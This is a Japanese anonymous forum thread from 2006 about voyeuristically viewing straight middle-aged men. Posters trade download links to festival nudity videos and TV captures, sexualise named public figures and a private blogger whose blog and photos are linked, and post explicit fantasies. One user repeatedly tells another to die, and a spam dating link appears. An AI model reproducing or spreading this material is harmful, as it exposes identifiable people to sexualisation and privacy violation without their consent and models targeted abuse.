平成18年12月8日より平成19年1月8日までの間、そのリモートホストを随時公開させていただきます。
リモートホスト公開措置そのものに誹謗中傷発言の抑制効果があるかどうかは
意見の分かれるところだと思いますが、
画像投稿者(いわゆるスレ主)様各位におかれまして
「無視すべきレス」を見分ける目安として役立てば、と考えています。


132 :陽気な名無しさん:2006/12/06(水) 00:57:16 ID:zUXCf47e
>>131
平目のIPがトップで上がるかもな

あ、平目はアク禁中だっけ?

133 :陽気な名無しさん:2006/12/06(水) 01:09:15 ID:BGNYRq1i
ミスKO候補だった美女AV女優が一流企業に就職して
AV出演を知っているガチムチ上司が表面上は平静を装いつつも
下半身はぼっきんきんなところを想像して抜くわ

134 :陽気な名無しさん:2006/12/06(水) 01:22:42 ID:SPQZdlq5
相変わらずカワイイな
ttp://pc.watch.impress.co.jp/docs/2006/1206/kaigai324_01.jpg

135 :陽気な名無しさん:2006/12/06(水) 02:04:07 ID:9dhGnRJy
今、目黒有機が、テレ東のTVショッピングに出てるけど、
厨房みたいな坊主なのね。
なかなか美味そうな年齢になってるね〜〜 食べたい!

136 :陽気な名無しさん:2006/12/06(水) 03:22:56 ID:BGNYRq1i
兄さん好きだぁああああああおかしくなりそう

137 :陽気な名無しさん:2006/12/06(水) 03:25:51 ID:mSO6SaFk
いい加減ウザったいわね。

138 :平目おやじ ◆X2X.2kWTU6 :2006/12/06(水) 04:22:17 ID:gYuPDpx1
>>131
かなり前に3年ぐらい前に書き込み禁止にされて以来
のん父には書き込みしてないよ
書き込み禁止解除希望・・”スージー様”
今ならキャプ出来るから美味しそうな画像貼れるよ
ちょいとおまえさんは書き込みできるけど
今は金さんが頑張り杉で手出しできない
おやじも書き込みしたいけど・・

139 :平目おやじ ◆X2X.2kWTU6 :2006/12/06(水) 07:53:29 ID:gYuPDpx1
10×3のブログ
URLわかんなく成っちゃった
履歴クリアしちゃったから
誰か親切な人教えて・・くれないよね(×_×)(×_×)

140 :陽気な名無しさん:2006/12/06(水) 08:41:47 ID:vBWZGT9M
>>139
10×3のブログ
ttp://10x3.blog75.fc2.com/

141 :陽気な名無しさん:2006/12/06(水) 19:26:17 ID:bQ9N2dYz
笑ってコラえて!
で南米取材中の足立ディレクターが可愛い〜〜
詳細キボン

142 :陽気な名無しさん:2006/12/06(水) 20:56:01 ID:Yd79heQ5
兄さんの汚尻と仮性包茎をセットでみたいよ・・・

143 :陽気な名無しさん:2006/12/06(水) 21:47:25 ID:Yd79heQ5
平目おやじさんへ
兄さんのプログのURL聞いてどうすんの?


144 :陽気な名無しさん:2006/12/06(水) 21:56:37 ID:feO47WMz
>>113
いいわ〜 

145 :陽気な名無しさん:2006/12/06(水) 22:31:30 ID:Yd79heQ5
兄さんプログ更新!

146 :平目おやじ ◆X2X.2kWTU6 :2006/12/06(水) 23:18:11 ID:gYuPDpx1
>>143
冗談だったのに・・

今は興味ないよ

ただ文章は散文的で旨いなと思った

147 :陽気な名無しさん:2006/12/07(木) 01:22:06 ID:6Euydqer
>>141
かわいいよね。
ディレクターとかADとかってかわいいのが多いよなぁ。

148 :陽気な名無しさん:2006/12/07(木) 01:59:46 ID:p7zZ1zgH
こんなスレを見つけたわ

■■■■タクシー運転手との経験談■■■■
http://sakura02.bbspink.com/test/read.cgi/gaypink/1162893699/

149 :陽気な名無しさん:2006/12/07(木) 18:48:58 ID:59QOVjR+
>>145
兄さんが怒っているのでもうやめましょう。
でもあんな画像は貼れるのにちん○がだめなんて
・・・ どうしたらいいの?


150 :陽気な名無しさん:2006/12/07(木) 19:32:36 ID:dHiaFAvs
メアド晒して送ってもらうのがいいと思う

151 :陽気な名無しさん:2006/12/07(木) 20:41:12 ID:YAMsGNkc


152 :陽気な名無しさん:2006/12/07(木) 23:00:45 ID:SuNp6Km2
硫黄島のドラマに藤竜也が出るのね。
藤を見ると、あのチンポが浮かぶわ〜
誰か映画をうpしてくれないかな〜

153 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 00:55:20 ID:fOSssAS4
10×3のブログがみれないよ〜

アク禁くらったか〜

そんな殺生な〜

154 :陽気な名無しさん:2006/12/08(金) 01:09:32 ID:6Be80BHO
ソース見ろよ。そんなこともわかんねえのかよ。馬鹿平目

155 :陽気な名無しさん:2006/12/08(金) 01:14:45 ID:2XQ+HI8r
鬱だわ・・

156 :10×3:2006/12/08(金) 01:44:16 ID:2iHUkTRj
禁を破って書いてもいいかな?

実は、精液画像でイエローカード貰ってたんだが、
みんなの要望に応えてちんこ画像うpしたら、
破門されてしまったよ。

ってのは嘘で、なんか俺だけではないみたい。
せっかくコメント書いてくれた人に礼を書いたのにな。

ttp://blog.fc2.com/forum/viewtopic.php?t=13991&start=15

157 :陽気な名無しさん:2006/12/08(金) 01:52:24 ID:2XQ+HI8r
>>156
めんどくさくなって消したわけじゃなかったのね
よかったわ!
朝起きたら復旧してたらいいな

158 :10×3:2006/12/08(金) 02:05:32 ID:2iHUkTRj
>>157
> めんどくさくなって消したわけじゃなかったのね

俺は信用ないんだな。
そりゃ、自分の尻とか放尿とか精液をネットに晒す
おっさんだもんな。

159 :陽気な名無しさん:2006/12/08(金) 02:14:12 ID:2XQ+HI8r
>>158
尿と精液のリクしたのはあたしなんでw
お願いに応えてくれたから信用はしてるわよ
あたし(たち)に愛想尽かしたのかと思ったの
兄さんのちんこはどうすれば見れるのかしら
リアルで拝見とか?

160 :10×3:2006/12/08(金) 02:20:34 ID:2iHUkTRj
無修正性器画像は掲載できない。
法令遵守だよ。
リアルは絶対駄目だ。
しかし精液は二度と見たいといわないな。
余程グロかったかな。

161 :陽気な名無しさん:2006/12/08(金) 02:27:26 ID:2XQ+HI8r
チャット状態でごめんなさい<スレのみなさま
でも最近はスレに動きがまったく無かったから少しは見逃してね

>>160
ぶっちゃけオナニーするたびに精液うpしてもらいたいわw
濃さとか量とか見比べたいわよ マニアックかもだけど
他の人は違う意見かもだけどw

ちんこ画像は確かにね
誰かがチクらないとも限らないし・・
正論言われると返す言葉がないわw

162 :10×3:2006/12/08(金) 02:35:58 ID:2iHUkTRj
>>161
> 正論言われると返す言葉がないわw

あたりまえだろ。
こんな俺も一応社会人だからな。

チャット状態はまずいな。
もういい加減にする。オナニーして寝るよ。
皆さん、スレ違いすんませんでした。



163 :陽気な名無しさん:2006/12/08(金) 02:48:09 ID:6Be80BHO
兄さんキテルー!

ねえねえ、ちんこ画像GMASKかけてじゃだめかなあ?
期待するする。

164 :陽気な名無しさん:2006/12/08(金) 03:36:26 ID:c+0basLq
ここは
ノンケ中年を覗き見放題【URL】24
http://love3.2ch.net/test/read.cgi/gaysaloon/1164630890/

165 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 05:21:03 ID:fOSssAS4
ヽ(^0^)ノわ〜ぃ
10×3のブログが復活してたよ〜

>>154
ソース見ろ所かアクセスが出来なかったんだよ
アクセスできないのにソースなんか見れる分けないだろ
しょうゆ野郎

166 :陽気な名無しさん:2006/12/08(金) 12:30:41 ID:UCnaPngF
はやく死ねよどんでん

167 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 16:32:36 ID:fOSssAS4
>>166

レベルの低いスレ違いかきこなんかしてんじゃね〜よ

馬鹿雑魚厨房

168 :陽気な名無しさん:2006/12/08(金) 16:50:35 ID:UCnaPngF
はやく死ねよどんでん

169 :陽気な名無しさん:2006/12/08(金) 17:01:44 ID:U8ZFNhSt
スレ違いカキコにいちいち反応してんじゃねーよ 中卒底辺が

170 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 17:24:39 ID:fOSssAS4
しまった〜

またもつられちゃった・・!

嫉妬してる雑魚馬鹿なんかどうでも良いのに

レベルの違いはどうにも成らないよね

うpも出来ない雑魚ちゃん

ここにも貼っとくね

http://moshimo.mine.nu/ppdush/down/1165564924.html
DLKey=a

171 :陽気な名無しさん:2006/12/08(金) 17:30:46 ID:UCnaPngF
はやく死ねよどんでん

172 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 17:55:25 ID:fOSssAS4
レベルの違いはどうにも成らないよね

うpも出来ない雑魚ちゃん

は・・置いといて

明日から旅行で当分これませんw

うれしいでしょう?アンチ平目おやじの皆さん

そう言うことで暫しお別れですw

173 :陽気な名無しさん:2006/12/08(金) 18:02:53 ID:gjCbTJxm
ものすごくうれしい!!

174 :陽気な名無しさん:2006/12/08(金) 18:09:18 ID:UCnaPngF
はやく逝けよどんでん

175 :陽気な名無しさん:2006/12/08(金) 19:09:28 ID:DcqR9TJW
>>172

短期出稼ぎ

176 :陽気な名無しさん:2006/12/08(金) 19:15:24 ID:Pb3ZOheh
素直にうれしい

177 :陽気な名無しさん:2006/12/08(金) 19:20:31 ID:Jl9So1d1
平目心境を語る

ttp://10x3.blog75.fc2.com/blog-entry-22.html

178 :陽気な名無しさん:2006/12/08(金) 19:49:44 ID:DcqR9TJW
ただ、おつむが弱いのね…

179 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 20:02:10 ID:fOSssAS4
しかし

雑魚レスが多いのは厨房が増えたからか

やだやだ・・おね〜様型は何処に行っちゃったんだろう

テレビから直取りしてた以前に比べれば

格段の進歩したおやじのうp

おね〜さまが方にほめてもらいたかった

でももういいや自己満足したから

おやじを召還しないでね来たくないから

そう言うことでよろぴこ

180 :陽気な名無しさん:2006/12/08(金) 20:06:57 ID:UCnaPngF
はやく死ねよどんでん

181 :陽気な名無しさん:2006/12/08(金) 20:25:13 ID:sXgi4rsu
どんでんって意外と芯があるね。
少し見直したよ。
明日から慰安旅行でいないからしばらく静観しましょう。

182 :陽気な名無しさん:2006/12/08(金) 20:30:33 ID:Bak+M1Mk
>>170 どうも有難う御座います〜〜〜。
えっと・・
終了間際にチラッと見えた「オシッコシーン」が、
とっても見たいのですが〜・・・
この続きをうpして頂けないでしょうか。^^;週末ですし〜。



183 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 20:59:36 ID:fOSssAS4
>>182
http://moshimo.mine.nu/ppdush/down/1165548466.html
DLKey=a

184 :陽気な名無しさん:2006/12/08(金) 21:00:27 ID:UCnaPngF
はやく死ねよどんでん

185 :陽気な名無しさん:2006/12/08(金) 21:32:29 ID:Bak+M1Mk
>>183 早速のうpありがとう御座いました。
ちょっとブレてるのがアレですけど、、見れて良かったで〜す。
この2部構成で完でしょうか。
やはり裸や褌の祭りってイイよね。興奮しちゃいます。


186 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 21:35:09 ID:fOSssAS4
http://moshimo.mine.nu/ppdush/down/1165553709.html
http://moshimo.mine.nu/ppdush/down/1165556941.html

187 :陽気な名無しさん:2006/12/08(金) 21:35:46 ID:UCnaPngF
はやく死ねよどんでん

188 :平目おやじ ◆X2X.2kWTU6 :2006/12/08(金) 21:36:58 ID:fOSssAS4
おやじはここはきたくないんだよ

ここぐらいまともなスレになればいいのにと思ってるから

だからアップは25に載せてあるんだよ

189 :陽気な名無しさん:2006/12/08(金) 21:37:30 ID:UCnaPngF
はやく死ねよどんでん

190 :陽気な名無しさん:2006/12/08(金) 22:14:35 ID:Bak+M1Mk
>>186 再三のうp、どうも有難う御座います。
一気に沢山の祭り動画が手に入って〜光栄です。^^


191 :陽気な名無しさん:2006/12/08(金) 23:03:27 ID:DcqR9TJW
>>188

了解しました


では ごきげんよう !!!

192 :陽気な名無しさん:2006/12/08(金) 23:39:11 ID:qpuYI5s4
0時くらいから日テレ
何とか副大臣のダイエット
ウエスト測る時腹毛アップなど

193 :置き引き 平目:2006/12/08(金) 23:40:01 ID:DcqR9TJW
>>188

地獄かしら?

194 :置き引き 平目:2006/12/08(金) 23:43:23 ID:DcqR9TJW
のん父のお約束にこんな追加が…

●投稿・返信するときの約束事●

◇(2006.12.5更新)誹謗中傷レスの投稿者のリモートホスト公開について
(期間限定 2006.12.8〜2007.1.8)
※目にあまる一部投稿者への対策ですので、それ以外の方はあまり気になさる必要はありません。※
年末年始のアクセス増加時期に向け、無益な論争をさけるための措置として、
誹謗中傷的な発言が多い傾向にあると管理者が判断した投稿者について、
平成18年12月8日より平成19年1月8日までの間、そのリモートホストを随時公開させていただきます。
リモートホスト公開措置そのものに誹謗中傷発言の抑制効果があるかどうかは
意見の分かれるところだと思いますが、
画像投稿者(いわゆるスレ主)様各位におかれまして
「無視すべきレス」を見分ける目安として役立てば、と考えています。



195 :陽気な名無しさん:2006/12/08(金) 23:43:56 ID:UCnaPngF
>>192
good job

196 :陽気な名無しさん:2006/12/09(土) 00:06:46 ID:h5AcBLlO
ごめん、おれ嘘ついたかも
(0時くらいか日テレ)

197 :陽気な名無しさん:2006/12/09(土) 00:10:54 ID:aUoQnJu5
↑うそじゃなくて間違えたんでしょ。
 うそは悪意があってするものなんだから・・・・・・
 気にしないで!

198 :陽気な名無しさん:2006/12/09(土) 00:20:07 ID:g9TAcSYu
やーん
オンエアバトル我慢して噛り付いてたのに〜

で、本当はいつ放送されるの?

199 :陽気な名無しさん:2006/12/09(土) 03:50:07 ID:8fAF8bTY
>>198
それじゃないけどニュースでやってたので安部タンの後ちょっとですが
DLKEYは0520
http://moshimo.mine.nu/ppdush/down/1165603161.html

200 :陽気な名無しさん:2006/12/09(土) 04:04:06 ID:8fAF8bTY
>>199
ごめ
こっちKEYは同じ
http://moshimo.mine.nu/ppdush/down/1165604037.html

201 :もっと他を希望:2006/12/09(土) 10:06:04 ID:GTcs6fN7
>>186
【身を清める】
堂々と脱ぎ、寒さで♂縮こまってる1番目のおじさんも良かったけど、
手で隠してた3番目も35秒で亀頭チラ見の半包茎がちゃんと見えてたね。
【祭りの余韻】
消防団員の放水で綺麗に自分の♂を洗うタイプじゃない青年にも、
さすがノンケ!!と思った。

202 :>>200:2006/12/09(土) 12:03:19 ID:kYDfMf0q
.datはどうやって開くんですか?なにかアプリケーションが必要?

203 :陽気な名無しさん:2006/12/09(土) 13:42:26 ID:b9r6SIjQ
>>199
ありがとう、武見たん全然毛が生えてないのね
もう一人の副大臣もアップで晒してほしいわ

>202
あたし全然ど素人だから突っ込まれそうだけど極窓にブチ込んだらlzhだったの
それを解答したらm2pと出たから、エクスプローラーで拡張子をmpgにしたの。
そしたらメディアプレイヤーで再生できたの。 (※詳しい人お願い!)

204 :陽気な名無しさん:2006/12/09(土) 13:44:17 ID:b9r6SIjQ
ごめんなさい 199じゃなくて>>200だったわ

205 :陽気な名無しさん:2006/12/09(土) 20:47:34 ID:aN7lGJkC
立花隆って全然イケてないけど何故か惹かれるのよね
なんか可愛いの。

206 :陽気な名無しさん:2006/12/09(土) 22:25:58 ID:dLqTILeG
のん父また落ちてる?

207 :陽気な名無しさん:2006/12/10(日) 00:50:13 ID:4l6hTnZ1
落ちてないよ

208 :陽気な名無しさん:2006/12/10(日) 00:54:48 ID:RRS/U64S
落ちてないけど、なんか重い。

209 :陽気な名無しさん:2006/12/10(日) 12:22:18 ID:gpzelBcL
>>186 ファイル形式が認識されず再生できなかった
もうちょっと素人向きのファイル形式の奴を下さい

210 :陽気な名無しさん:2006/12/10(日) 12:34:25 ID:ho+CfEHq
拡張子はzipなわけなんだけども

211 :陽気な名無しさん:2006/12/10(日) 12:42:46 ID:TKvb6N6i
>>209
はぁ?
見れない人がいるなんて思わなかったよ
保存して解凍
開いてみる
どちらかでみれない?
普通に見れるんだけどGOMとかじゃなくても

http://www.mediafire.com/?6zhyjjymynr
ちなみに総集編・・

212 :陽気な名無しさん:2006/12/10(日) 15:10:04 ID:Etz2MFiv
>>211 ありがd 一連になって見やすいね
蘇民で勃起してるのがあるらしいけど持ってたらヨロシク〜

213 :陽気な名無しさん:2006/12/10(日) 15:10:54 ID:i2WCDpVK
図々しすぎ

214 :陽気な名無しさん:2006/12/10(日) 15:27:02 ID:TKvb6N6i
>>212
蘇民はここで順番待ちだよ

http://www2.axfc.net/uploader/6/so/N6_2586.zip.html

215 :陽気な名無しさん:2006/12/10(日) 17:53:00 ID:qlmDghkH
>>214
これって以前ここで「後編」がうpされたけど、それですか?
また、DLキーワードは何ですか?
あれ?これってなかなか落せないサイトじゃなかったっけ?

216 :陽気な名無しさん:2006/12/10(日) 17:56:41 ID:TKvb6N6i
図々しすぎ

217 :陽気な名無しさん:2006/12/10(日) 19:28:04 ID:FUgC6sEJ
ttp://headlines.yahoo.co.jp/hl?a=20061210-00000017-maip-soci.view-000

218 :陽気な名無しさん:2006/12/10(日) 19:38:00 ID:9Ss6vtDE
こぶ平がうまそう・・・・
エッチうまいらしいね

219 :陽気な名無しさん:2006/12/10(日) 20:01:22 ID:izVuHwkC
今晩のさんまのからくりTVご覧になったかしら?
生徒だけの学級会の本日の学校。
校長、教頭とも強面で最高な学校。
ああ、今からでも入学して、やんちゃやって
いびられたいわ。

220 :陽気な名無しさん:2006/12/10(日) 20:33:42 ID:bjGX+INo
前列左のヒゲかわいい

221 :陽気な名無しさん:2006/12/11(月) 06:46:33 ID:DtXdnz5K
オネェは図々しくなくちゃ!!!ネ♪
>>214落したいんだけどっ!!!

222 :陽気な名無しさん:2006/12/11(月) 09:51:33 ID:1636ZPMh
素直に順番を待てば落とせるジャン

223 :陽気な名無しさん:2006/12/11(月) 11:28:56 ID:gj7i5uBv
兄さんブログ見れないね
またサーバーのトラブルかな

224 :陽気な名無しさん:2006/12/11(月) 12:22:13 ID:ak1IfXEx
馴れ合ってるとか批判されて、やめたんじゃない?

225 :陽気な名無しさん:2006/12/11(月) 12:25:27 ID:UMtTDWy1
その話題はせめて平目の立てたスレでしない?

226 :陽気な名無しさん:2006/12/11(月) 12:39:16 ID:1636ZPMh
>>225
あの・・

ここもおやじが作ったんですけど

でもこちらはなるべく顔出しませんので

あなたの言うように25でその話題はしたほうがいいですね

10×3のブログ見えますよ開いてますよ

227 :陽気な名無しさん:2006/12/11(月) 12:57:27 ID:gj7i5uBv
この人、ポッドキャストもやってたんだ。
ttp://live.ladio.livedoor.com/special/hiramatsuradio/

既出?

228 :陽気な名無しさん:2006/12/11(月) 12:57:44 ID:ak1IfXEx
>>225
ごめんなさい。
ここは本スレですね。
その話題が出てるからここが25だと思ってました。
気をつけます。

229 :陽気な名無しさん:2006/12/11(月) 13:37:00 ID:hh5hrnWE
>>226
ヒラメ、おめぇがこのスレ立てたんかよw
最悪だな、おまえ

230 :陽気な名無しさん:2006/12/11(月) 13:56:18 ID:1636ZPMh
ばか〜冗談に決まってるだろ

IDを見れば分かりそうだろう

同じ時期におやじは違うIDを使ってるよ

少しは考えろ・・ばか〜

231 :陽気な名無しさん:2006/12/11(月) 14:35:29 ID:hh5hrnWE
IDなんかどうとでもなるだろ。
もし冗談なら悪質な冗談だ。てかあれ冗談になってんの?ただボロが出ただけじゃねぇ?
どちらにしろ最悪だ
兄さんに詫びとけ、カスが

232 :陽気な名無しさん:2006/12/11(月) 14:42:56 ID:1636ZPMh
隔離スレに誘導?

http://love3.2ch.net/test/read.cgi/gaysaloon/1164906309/l50

くだらないカキコはこちらでしなさい

233 :陽気な名無しさん:2006/12/11(月) 21:44:20 ID:o+UvGggG
藤竜也
懐かしいし、若いな〜 やっぱカッコいい!
http://www.youtube.com/watch?v=vxI8-Lxafn4

234 :陽気な名無しさん:2006/12/11(月) 22:35:47 ID:mFElrzYP
愛のコリーダだと殿山泰司の剥けチンポを見てみたい!
いっぺんも見た事ない

235 :陽気な名無しさん:2006/12/12(火) 08:47:01 ID:gjEszz+o
上のほうでGOMで見れないDATがあるんですけどどうやったら見れますか?

236 :陽気な名無しさん:2006/12/12(火) 09:06:59 ID:gjEszz+o
>>186GOMでも見れないんですが、、、

237 :陽気な名無しさん:2006/12/12(火) 09:32:57 ID:J5YiA+XT
保存して解凍した?

DATのアイコンは開くで見れるはずだよ

238 :陽気な名無しさん:2006/12/12(火) 10:08:40 ID:gjEszz+o
>>237

他のもの(蘇民やおじさんのオナニー、奥さんとのセックス)
は見れるのですが、、、
ファイル形式も全く同じなんですが>>186とかはファイルが壊れてますとか出てきます。
ウィンドウズ2000でやってます。プレーヤーはGOM。

239 :陽気な名無しさん:2006/12/12(火) 10:09:38 ID:gjEszz+o
>>237

解凍ですか?DATファイルだからいいのかなって思ったのですが、、、

240 :陽気な名無しさん:2006/12/12(火) 10:46:51 ID:J5YiA+XT
http://www2.axfc.net/uploader/7/so/N7_5851.zip.html
これみれない?
ダウンキーはoyajisan
ここ混むから早いもの勝ちだよ
祭を全部まとめてあるから・・

241 :陽気な名無しさん:2006/12/12(火) 21:46:44 ID:YK/H9JPt
>>240 なんでこう、混むサイトを使うかなぁ。(ーー;
DL規制が無いサイトがあるのに・・




242 :陽気な名無しさん:2006/12/12(火) 21:59:59 ID:Qc9MGoJm
愛のコリーダなら、GYAOで見られたわよ。
先月の話だけど、数ヶ月経ったらまた見られるて思うわ。

243 :陽気な名無しさん:2006/12/13(水) 04:51:48 ID:FIHUhmNf
>>242
もちろんノーカットモザな市よね?


244 :陽気な名無しさん:2006/12/13(水) 04:59:50 ID:JRPMp6Z8
>>241
あれば苦労しないんだよ〜

教えてクレよ・・そういうところを

245 :陽気な名無しさん:2006/12/13(水) 05:23:45 ID:JRPMp6Z8
>>241
250MBをあっぷできるところがあるんかい〜

250MBアップするのにどのぐらい時間がかかるか知らないだろ〜

小1時間かかるんだよ〜

ボランティアーでやってるのに・・ぶ〜たれるんじゃね〜よ

246 :陽気な名無しさん:2006/12/13(水) 06:28:48 ID:JRPMp6Z8
こっちにも・・貼りますw

http://www.mediafire.com/?fodozhdmyul


247 :陽気な名無しさん:2006/12/13(水) 07:09:45 ID:t/2IoY60
>>245
???
誰も頼んでないのにw

248 :うp命おやじ ◆X2X.2kWTU6 :2006/12/13(水) 07:57:51 ID:JRPMp6Z8
>>247
すまん・・

貼らしてくれ〜

貼らないと気が済まないんだよ〜

もはや病的な拘り〜だ

http://www5.axfc.net/uploader/9/so/N9_11565.zip.html

ダウンキーは

中山秀行(ゆきの字が違うかも)の昔のコンビ名ローマ字二文字

249 :陽気な名無しさん:2006/12/13(水) 17:36:31 ID:phk1Se9Q
http://diet.bc-fri.com/


http://pc.watch.impress.co.jp/docs/2006/1213/gyokai186_02.jpg



250 :陽気な名無しさん:2006/12/13(水) 17:39:10 ID:7w3HzkNm
>>241

キモいんだよ!! クレクレ能なし無職カマが!!

251 :陽気な名無しさん:2006/12/13(水) 18:12:35 ID:6wrUxZQi
無料ポイント分でうまくいけば会える。けっこうオススメ。
http://www.117558.com/?86kbb

252 :うp命おやじ ◆X2X.2kWTU6 :2006/12/13(水) 18:24:32 ID:JRPMp6Z8
>>250
貴様にそんなこと言う資格あるのか?

253 :うp命おやじ ◆X2X.2kWTU6 :2006/12/13(水) 18:27:26 ID:JRPMp6Z8
>>241
今774全然駄目なんだよ重くて開かないし
アップ途中で駄目に成っちゃうし・・


254 :うp命おやじ ◆X2X.2kWTU6 :2006/12/13(水) 22:05:17 ID:JRPMp6Z8
こっちにも貼り付けておこう

以前誰かがアップした腕を入れてるの見た事あるけど

http://www3.axfc.net/uploader/12/so/N12_12864.zip.html

腕が入った瞬間って頭の血がひいていくんだろうね



255 :陽気な名無しさん:2006/12/13(水) 23:13:50 ID:W1bpT5LN
ttp://pc.watch.impress.co.jp/docs/2006/1213/gyokai186_01.jpg
ttp://pc.watch.impress.co.jp/docs/2006/1213/gyokai186_02.jpg

ttp://zip.2chan.net/2/src/1165986206700.jpg
ttp://zip.2chan.net/2/src/1166002617253.jpg

256 :陽気な名無しさん:2006/12/14(木) 00:14:57 ID:ASJIV0wG
のんちちがまた落ちてる件に関して平目やらどんでんと言う方のせいでしょうか?
ぶっちゃけ迷惑なんですけどうちの掲示板まで巻き添え喰って落ちてるやないの!!

257 :陽気な名無しさん:2006/12/14(木) 00:29:22 ID:KcuuIAiK


258 :陽気な名無しさん:2006/12/14(木) 01:20:56 ID:9/ryl10Q
>>255
大河原御大って基本的に美男子だよね
昔の美男子

259 :うp命おやじ ◆X2X.2kWTU6 :2006/12/14(木) 05:41:10 ID:41AndbNt
>>256
なんでもおやじのせいにするんじゃね〜よ

そんなことが出来たらとっくの昔にしてるよ〜

260 :陽気な名無しさん:2006/12/14(木) 23:51:54 ID:o/jVTP/I
ところで、スレ25の900
ttp://image.blog.livedoor.jp/n2ublog-00016/imgs/1/7/177569e2.jpg
は、中央の奴が画像の有り場所のサイト主。

本人もまずまずの年齢で、
ここのスレのターゲットに十分含まれるとも思うんだが、
二代目ボンボン社長ぽいキャラクターがなーんか鼻について、
今イチ好きになれない。

261 :陽気な名無しさん:2006/12/14(木) 23:54:31 ID:o/jVTP/I
肝心のURL忘れたがな。

河合達明の笑いと涙のブライダルブログ
ttp://brass.livedoor.biz/

ちなみに股間はこんな感じ。
ttp://image.blog.livedoor.jp/n2ublog-00016/imgs/7/c/7cb07fef.jpg

262 :陽気な名無しさん:2006/12/15(金) 00:14:11 ID:QH41MePy
>>261
ごめん・・・目の下のブツブツが生理的にだめ

263 :陽気な名無しさん:2006/12/15(金) 00:21:12 ID:jKel6gy0
ま、新生アイドルには役者不足かもな。w

一応、寄せマラ画像上げとく。
ttp://imgb.rentalcgi.com/view/nonkeoyk/1166108875.jpg.html

264 :陽気な名無しさん:2006/12/15(金) 01:00:00 ID:pc0nX9vs
ワロタ

265 :陽気な名無しさん:2006/12/15(金) 01:06:12 ID:5ZHriUWx
このまま行くと、キチガイ平目のうpより先に
隔離スレ(25)が終わってしまい、またまたここ(本スレ)が
汚染される恐れがある。

でどうだろう、隔離スレ(25)の次スレとして、
「【ノンケ・ホモ】中年を覗き見放題」という新スレをたてて
ホモ動画を容認する。
そして、ここが終了後は、25の441さんの提案どおり
「ノンケ中年丸秘報告スレ」をつくって継承する。
伝統ある「ノンケ中年を覗き見放題」は終了となるけど
そろそろ決断してもいいのでは。

266 :陽気な名無しさん:2006/12/15(金) 02:13:18 ID:KZJumk80
>>260
画像右側のオトコ以外は要らないわ。
はみ出た股毛がエロいわ〜。

267 :陽気な名無しさん:2006/12/15(金) 02:21:44 ID:GCkavHrS
左もキモイ茶髪を刈り上げて口髭生やせばかなりイケると思うわ〜

268 :陽気な名無しさん:2006/12/15(金) 02:57:21 ID:fpmSU7fV
>>266
そうそう、てっきり右のひげオヤジを話題にしてるのかと思ったら・・・w

269 :陽気な名無しさん:2006/12/15(金) 03:16:11 ID:KZJumk80
>>260-261>>263
> 役者不足

役不足って言いたいのかしら?タイプミスとは言わせないわよw
本を読みなさい。

でもねたとえ正しく「役不足」って書いてあったとしても、
力不足って意味で使ってるわね。それも間違い。

270 :陽気な名無しさん:2006/12/15(金) 07:36:27 ID:8+QBn6Hk
>>269が馬鹿過ぎてわざとやってるとしか思えないんですが...
ttp://d.hatena.ne.jp/keyword/%CC%F2%C9%D4%C2%AD
ttp://www.tackns.net/word/yakubusoku.html
ttp://plaza.rakuten.co.jp/countdownblog/diary/200605260000/
「新しいアイドルは河○社長には荷が重いのでは」と言ってるわけであって

271 :陽気な名無しさん:2006/12/15(金) 10:41:42 ID:XJpe7QGV
山下股間画像がおいしすぎて
JRに意味もなく乗りたくなったわ。
あんな重量級だったとは・・。

272 :陽気な名無しさん:2006/12/15(金) 13:26:39 ID:potu1d8X
>>271
山下股間画像ってどれですか?
教えてください!(>ω<)

273 :陽気な名無しさん:2006/12/15(金) 14:42:46 ID:XJpe7QGV
ttp://www.yamashitayasuhiro.com/kouenroku/061206/index.html
あたしったら優しいわね。
PDFだからプリンタで出せるわよ。

274 :陽気な名無しさん:2006/12/15(金) 14:49:59 ID:VcKo8t9d
やばいわ、玉袋がくっきり浮き出てるわwwwwwwww

275 :陽気な名無しさん:2006/12/15(金) 15:26:38 ID:+gKVzSi0
おいら山下先生のそのふくらみを顔と手で触れたことある。
中学の時の柔道の顧問が山下先生と同期で稽古にきてもらいました。
苦手な固め技の克服ということで(返しね)、おいらは上四方固めをお願いしました。
先ずはおいらが技を掛けたんだけど、当然のごとくあっさり返されました。
同じようにやってみろと、山下先生に技を掛けられたんだけど返せるわけがない!!
先生の下腹あたりが顔にのっているので息苦しいし、何とかもがいて片腕を入れ自分の頭上にもっていったときにその感触を味わいました。
さらにもがいてそこに顔をもっていたw

思い出したら勃ってきた!!

276 :陽気な名無しさん:2006/12/15(金) 16:02:14 ID:XJpe7QGV
>>275
うらやましいわ。
彼って理想のタイプの一つなのよね。
ムネタンも好きだけど。
とりあえず寝技を教えてもらって体臭を嗅ぎたいわw


277 :陽気な名無しさん:2006/12/15(金) 18:16:16 ID:fqikKZxz
>>273
サンクス
これはタマ袋なのかな?竿が寄ってる感じなのかな?
どちらにしても、いいボリューム!
個人的には、現役のもっとプニプニしていた頃が一番理想だったけど。

ちなみに、Adobe Readerのピクチャの書き出しすれば
そのままjpgで保存できるよ


278 :陽気な名無しさん:2006/12/15(金) 18:39:11 ID:/trkWWGB
おお、ここ本来の雰囲気が復活してる

この5ヶ月は悪い夢を見ていたってことで

279 :陽気な名無しさん:2006/12/15(金) 20:28:04 ID:vBM42iw8
>>273
ほんとに優しいわ、ありがとう

>>277
Adobe Readerわざわざダウンロードしたわ、
なんだかワケの分からないソフトが勝手に開いたけどjpgで保存できたわ!

280 :陽気な名無しさん:2006/12/15(金) 20:33:12 ID:vBM42iw8
↑ごめんなさい、今やってみたらPhotoshopでPDF開けたわ
知らなかったわ…

281 :陽気な名無しさん:2006/12/15(金) 23:58:06 ID:yDm46a5Q
>>280
Photoshop持ってるのにAdobe Reader持ってないなんて・・・

282 :陽気な名無しさん:2006/12/16(土) 00:13:50 ID:+tyK2sPR
このビデオのお父さんいい感じなんだけど

ttp://www.chubold.com/movie/title17/v869.jpg

283 :陽気な名無しさん:2006/12/16(土) 00:18:36 ID:c2+5W6UE
>>270
朝っぱらからそんなムキにならなくても
あんたが>>260-261>>263だってことはわかるわ。
